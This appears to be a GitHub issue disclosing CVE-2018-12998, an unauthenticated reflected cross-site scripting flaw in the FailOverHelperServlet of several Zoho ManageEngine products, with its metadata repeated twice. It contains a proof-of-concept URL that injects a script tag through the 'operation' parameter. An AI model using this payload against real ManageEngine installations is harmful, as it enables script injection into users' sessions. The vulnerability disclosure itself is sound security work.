Open unh3x opened 6 years ago
Date: 2018/06/20 Software Link: https://www.manageengine.com/products/firewall/download.html Category: Web Application Affected Products:
Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer
Exploit Author: xiaotian.wang From DBAppSecurity CVE: CVE-2018-12998
com.adventnet.me.opmanager.servlet.FailOverHelperServlet
/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111<script>alert(1)</script>
Notice: This vul can reproduce without login.
================= Zoho manageengine XSS in multiple Products
Date: 2018/06/20 Software Link: https://www.manageengine.com/products/firewall/download.html Category: Web Application Affected Products:
Exploit Author: xiaotian.wang From DBAppSecurity CVE: CVE-2018-12998
================= Vulnerable cgi:
com.adventnet.me.opmanager.servlet.FailOverHelperServlet
================= Proof of Concept:
Notice: This vul can reproduce without login.